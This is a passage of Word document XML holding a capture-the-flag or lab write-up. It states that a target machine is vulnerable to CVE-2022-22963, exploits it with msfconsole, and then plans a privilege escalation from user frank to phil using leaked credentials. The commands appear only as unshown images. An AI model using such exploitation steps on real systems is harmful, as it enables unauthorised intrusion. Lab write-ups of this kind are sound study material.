    <w:p w14:paraId="66D24412" w14:textId="5BF0BE36" w:rsidR="00D40DC8" w:rsidRPr="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>System properties: The Runtime class provides methods for getting and setting system properties, such as the Java version and the operating system name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5355560A" w14:textId="1CC10A5E" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40DC8">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Shutdown hooks: The Runtime class provides a way to register shutdown hooks, which are threads that are executed when the JVM is shutting down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B77E6F" w14:textId="7E7A2A55" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB7000E" w14:textId="65651113" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Can we use it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714CE4FC" w14:textId="4B08D863" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes, our target machine is indeed vulnerable to this, because it matches all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>pre’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be affected by this CVE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D621D77" w14:textId="453D605B" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA66596" w14:textId="3094263A" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E8B46C7" w14:textId="0027139E" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76284746" w14:textId="02432F16" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66721B02" w14:textId="42830886" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EAE3A2" w14:textId="492B875B" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F48F2B" w14:textId="322527AF" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56702DDA" w14:textId="289BF6C3" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02566645" w14:textId="479E06DC" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1479FCB2" w14:textId="26DFE9D2" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7719D6C2" w14:textId="3550B688" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7477422A" w14:textId="1E323F65" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B6BC2B" w14:textId="655D731E" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB313A0" w14:textId="2704A7DC" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A86861" w14:textId="1BF42241" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation of CVE-2022-22963:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD2D74C" w14:textId="6EAB3057" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">We could do it manually, but there’s a chance that we could use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to exploit it, so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> try that first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D41BA69" w14:textId="44722F51" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21727BFA" wp14:editId="01048520">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>236220</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3008630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C99E2" w14:textId="570439A6" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B73D74" w14:textId="77777777" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B719C12" w14:textId="6B8E17FB" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453AE50E" w14:textId="260FDEFE" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752C9E9A" w14:textId="34258C4A" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D76364" w14:textId="3791F5A2" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1D165C" w14:textId="517E44ED" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364F4167" w14:textId="23BF0429" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B311D41" w14:textId="47A20109" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D3142BE" w14:textId="0385F3B9" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A9D8A2" w14:textId="18138FE8" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126DB00C" w14:textId="1DD8D5D2" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74276EB0" wp14:editId="7C6ABB15">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>236220</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>137160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1853565"/>
            <wp:effectExtent l="0" t="0" r="254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53565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0BD129" w14:textId="16236960" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76750132" w14:textId="33A735CA" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07160DF8" w14:textId="5C4CA098" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF9B98F" w14:textId="1EA2E7E6" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="613130B1" w14:textId="69F5D702" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42441484" w14:textId="47B51969" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5A12D0" w14:textId="42B15C29" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544A2389" w14:textId="0BA4CF20" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>And we’re in!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D19D79" w14:textId="4E6DBF80" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>PrivEsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D25C3">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Frank -&gt; Phil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E442790" w14:textId="10A2A9C0" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Now at the moment we’re frank, and as u can see at the bottom, the user flag is in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>phil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> user directory and we can’t read it. This means we have to escalate our privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C9EBE" w14:textId="180A95F3" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BA3BDEA" wp14:editId="195AC9A3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1866900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>148590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4245610" cy="2208884"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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610" cy="22088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94D68E" w14:textId="3A2DBB8F" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A98FF81" w14:textId="03D4DC0D" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09BC90CE" w14:textId="76B29B33" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B907D15" wp14:editId="4C819CE1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-701040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>165100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2156460" cy="449580"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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6460" cy="449580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFE2D5F" w14:textId="5E489D74" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CD6520" w14:textId="3CAD4B60" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F31780A" w14:textId="07D7137E" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="611385EA" w14:textId="4505443D" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7617B704" w14:textId="77777777" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E4DD9E9" w14:textId="3F11ED6B" w:rsidR="00D40DC8" w:rsidRDefault="00D40DC8" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DCDE502" w14:textId="57A5DA3C" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Before doing anything fancy for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>PrivEsc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> from frank to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>phil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>, I just checked out all the files frank had read access to and I’ve found a credentials leakage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62187E19" w14:textId="6EF45B09" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E898A81" wp14:editId="1385DC9E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>236220</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="2644775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="317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anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A257BF" w14:textId="77777777" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="068539F3" w14:textId="116D54BF" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A58D178" w14:textId="2C68B745" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484BA144" w14:textId="18768752" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1632118F" w14:textId="6A97C32D" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0E88B6" w14:textId="749F5E12" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E8BBF9" w14:textId="1B7FF46F" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D109EA" w14:textId="5EAC29E7" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066AF654" w14:textId="5078A033" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA69A65" w14:textId="2DD585CE" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33205E79" w14:textId="2C89AB7D" w:rsidR="005B2E84" w:rsidRDefault="005B2E84" w:rsidP="005B2E84">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
